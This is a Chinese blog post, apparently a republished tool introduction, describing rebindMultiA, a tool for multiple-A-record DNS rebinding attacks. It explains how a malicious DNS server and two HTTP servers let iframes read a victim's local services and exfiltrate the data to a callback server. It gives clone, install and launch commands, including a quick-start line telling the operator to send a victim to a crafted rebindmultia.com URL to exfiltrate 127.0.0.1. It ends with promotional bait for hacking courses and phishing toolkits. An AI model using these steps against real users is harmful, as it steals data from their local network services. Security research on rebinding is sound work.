rebindMultiA：一款功能强大的多重A记录重绑定攻击测试工具

关于rebindMultiA

rebindMultiA是一款功能强大的多重A记录重绑定攻击测试工具，该工具可以帮助广大研究人员通过针对目标域名执行多重A记录重绑定攻击，来测试目标域名或地址的安全情况。

工具提供了一个rebindmultia.com域名，用来帮助广大研究人员使用该工具来进行测试实践。它会让每一个IP地址都成为[IP].ns.rebindmultia.com域名的权威域名服务器。比如说，13.33.33.37.ns.rebindmultia.com权威域名服务器为13.33.33.37.ip.rebindmultia.com，并解析为13.33.33.37。

多重A记录重绑定攻击

多重A记录重绑定攻击是DNS重新绑定的一种变体，它能够允许攻击者在响应DNS请求时使用两个IP地址进行响应，并让浏览器在第一个IP没有响应时回退到DNS响应中的第二个IP。在此次攻击中，攻击者将配置一个恶意DNS服务器和两个恶意HTTP服务器。DNS服务器将使用两个A记录进行响应：

127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 13.33.33.37

127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 127.0.0.1

接下来，目标浏览器将连接到第一个IP，并开始与攻击者的第一个恶意HTTP服务器进行交互。此服务器将以包含两个iframe的页面作为响应，一个指向/steak，另一个指向/rebind。/steake iframe将加载一个恶意页面，以访问第二个iframe并获取内容。/rebind端点在被击中时，将发出302重定向到/并终止第一个恶意HTTP服务器的运行。因此，当浏览器返回到攻击者的HTTP服务器时，它将遇到一个关闭的端口。因此，它将回退到第二个IP。一旦目标内容被加载到第二个iframe中，第一个ifame就可以访问它，窃取数据，并将其过滤到攻击者的第二个恶意HTTP服务器——回调服务器。

此攻击仅适用于Windows环境。Linux和Mac将首先默认为私有IP，并且永远不会查询攻击者的服务器。

工具运行机制

工具安装

由于该工具基于Python 3开发，因此我们首先需要在本地设备上安装并配置好Python 3环境。接下来，广大研究人员可以使用下列命令将该项目源码克隆至本地：

git clone https://github.com/Rhynorater/rebindMultiA.git

然后使用pip3命令和项目提供的requirements.txt文件安装该工具所需的依赖组件：

pip3 install -r requirements.txt

工具使用

使用--help命令可以直接查看工具的帮助选项：

python3 server.py --help

usage: server.py [-h] [-p PORT] [-c CALLBACK_PORT] [-d DNS_PORT] [-f FILE] [-l LOCATION]

 

optional arguments:

  -h, --help            显示工具帮助信息和退出

  -p PORT, --port PORT  指定目标IP的端口，默认为80

  -c CALLBACK_PORT, --callback-port CALLBACK_PORT

                        指定回调HTTP服务器的端口，默认为31337

  -d DNS_PORT, --dns-port DNS_PORT

                        指定DNS服务器端口，默认为53

  -f FILE, --file FILE  指定HTML文件来显示第一个iframe，默认为steal.html

  -l LOCATION, --location LOCATION

                        指定需要从目标设备上窃取数据的地址，默认为/

如果你遇到如下所示的错误信息：

┬─[justin@RhynoDroplet:~/p/rebindMultiA]─[14:26:24]─[G:master=]

╰─>$ python3 server.py

 

Traceback (most recent call last):

  File "server.py", line 2, in <module>

    from http.server import HTTPServer, BaseHTTPRequestHandler, ThreadingHTTPServer

ImportError: cannot import name 'ThreadingHTTPServer'

请尝试使用更新版本的Python 3.7+环境。

快速使用

下列命令需要在一台可以被公共访问的IP主机上执行：

git clone https://github.com/Rhynorater/rebindMultiA

cd rebindMutliA

pip3 install -r requirements.txt

echo "Send your victim to http://127.0.0.1.target.`curl -s http://ipinfo.io/ip`.ns.rebindmultia.com/parent to exfil 127.0.0.1"

sudo python3 server.py

黑客&网络安全如何学习

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

 1.学习路线图 

 攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等，都是网络安全入门必知必会的学习内容。

 （都打包成一块的了，不能一一展开，总共300多集）

因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取

3.技术文档和电子书

技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本，由于内容的敏感性，我就不一一展示了。 

 因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等，感兴趣的同学不容错过。 

 还有我视频里讲的案例源码和对应的工具包，需要的话也可以拿走。

因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取

 最后就是我这几年整理的网安方面的面试题，如果你是要找网安方面的工作，它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的，如果大家有好的题目或者好的见解欢迎分享。

参考解析：深信服官网、奇安信官网、Freebuf、csdn等

内容特点：条理清晰，含图像化表示更加易懂。

内容概要：包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

 因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取